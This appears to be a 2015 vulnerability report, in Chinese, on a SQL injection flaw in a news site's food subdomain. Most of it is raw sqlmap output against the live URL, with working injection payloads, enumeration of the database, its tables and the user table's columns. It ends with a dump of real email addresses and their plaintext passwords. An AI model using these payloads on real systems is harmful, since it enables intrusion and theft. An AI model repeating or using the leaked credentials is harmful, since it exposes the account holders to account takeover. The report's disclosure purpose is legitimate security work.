2015-10-16: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-30: 厂商已经主动忽略漏洞,细节向公众公开
北青网下某域名北青汽车存在SQL注入漏洞,可导致数据库泄露
北青.食品注入点:http://bqfood.ynet.com/cgi/news.php?id=529503
直接贴sqlmap日志了,如下:
sqlmap identified the following injection points with a total of 66 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=529503 AND 3707=3707 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=529503 AND (SELECT 7830 FROM(SELECT COUNT(*),CONCAT(0x7163736471,(SELECT (CASE WHEN (7830=7830) THEN 1 ELSE 0 END)),0x7175656d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 25 columns Payload: id=-4223 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7163736471,0x75636252756577444c53,0x7175656d71),NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=529503 AND SLEEP(5)---web application technology: PHP 5.3.29back-end DBMS: MySQL 5.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=529503 AND 3707=3707 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=529503 AND (SELECT 7830 FROM(SELECT COUNT(*),CONCAT(0x7163736471,(SELECT (CASE WHEN (7830=7830) THEN 1 ELSE 0 END)),0x7175656d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 25 columns Payload: id=-4223 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7163736471,0x75636252756577444c53,0x7175656d71),NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=529503 AND SLEEP(5)---web application technology: PHP 5.3.29back-end DBMS: MySQL 5.0current user: 'cgi@localhost'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=529503 AND 3707=3707 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=529503 AND (SELECT 7830 FROM(SELECT COUNT(*),CONCAT(0x7163736471,(SELECT (CASE WHEN (7830=7830) THEN 1 ELSE 0 END)),0x7175656d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 25 columns Payload: id=-4223 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7163736471,0x75636252756577444c53,0x7175656d71),NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=529503 AND SLEEP(5)---web application technology: PHP 5.3.29back-end DBMS: MySQL 5.0current database: 'foodbq'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=529503 AND 3707=3707 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=529503 AND (SELECT 7830 FROM(SELECT COUNT(*),CONCAT(0x7163736471,(SELECT (CASE WHEN (7830=7830) THEN 1 ELSE 0 END)),0x7175656d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 25 columns Payload: id=-4223 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7163736471,0x75636252756577444c53,0x7175656d71),NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=529503 AND SLEEP(5)---web application technology: PHP 5.3.29back-end DBMS: MySQL 5.0Database: foodbq[25 tables]+--------------+| global || user || article_from || auto_ad || auto_comment || auto_index || blank_data || complain || fenlei || food_person || food_right || food_topic || food_topic1 || friend_links || navcode || navigation || news || news_top || news_top1 || pic_defaults || polymorphic || sp_t28 || temp || tempdef || tuijian_top |+--------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=529503 AND 3707=3707 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=529503 AND (SELECT 7830 FROM(SELECT COUNT(*),CONCAT(0x7163736471,(SELECT (CASE WHEN (7830=7830) THEN 1 ELSE 0 END)),0x7175656d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 25 columns Payload: id=-4223 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7163736471,0x75636252756577444c53,0x7175656d71),NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=529503 AND SLEEP(5)---web application technology: PHP 5.3.29back-end DBMS: MySQL 5.0Database: foodbqTable: user[12 columns]+----------------+------------------+| Column | Type |+----------------+------------------+| createdatetime | datetime || creator | varchar(40) || cu_id | int(10) || d_id | int(12) unsigned || email | varchar(255) || mender | varchar(40) || mu_id | int(10) || nick | varchar(255) || passwd | varchar(255) || published | char(1) || savedatetime | datetime || url_1 | varchar(255) |+----------------+------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=529503 AND 3707=3707 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=529503 AND (SELECT 7830 FROM(SELECT COUNT(*),CONCAT(0x7163736471,(SELECT (CASE WHEN (7830=7830) THEN 1 ELSE 0 END)),0x7175656d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 25 columns Payload: id=-4223 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7163736471,0x75636252756577444c53,0x7175656d71),NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=529503 AND SLEEP(5)---web application technology: PHP 5.3.29back-end DBMS: MySQL 5.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=529503 AND 3707=3707 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=529503 AND (SELECT 7830 FROM(SELECT COUNT(*),CONCAT(0x7163736471,(SELECT (CASE WHEN (7830=7830) THEN 1 ELSE 0 END)),0x7175656d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 25 columns Payload: id=-4223 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7163736471,0x75636252756577444c53,0x7175656d71),NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=529503 AND SLEEP(5)---web application technology: PHP 5.3.29back-end DBMS: MySQL 5.0Database: foodbqTable: user[236 entries]+---------------------------------------------------------------------------------+--------------------------+| email | passwd |+---------------------------------------------------------------------------------+--------------------------+| xinshou_2008@qq.com | 111111 || xinshou_2009@qq.com | 111111 || 1180486@qq.com | 111111 || yipeng.gnu@gmail.com | 123456 ||woshinindaye0003 | abc123 | pcshtyzmn@163.com | kcnl || ilgbyfwlm@163.com | tsfoeml || 317170012 | 317170012 |+---------------------------------------------------------------------------------+--------------------------+
选取部分账号,密码
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)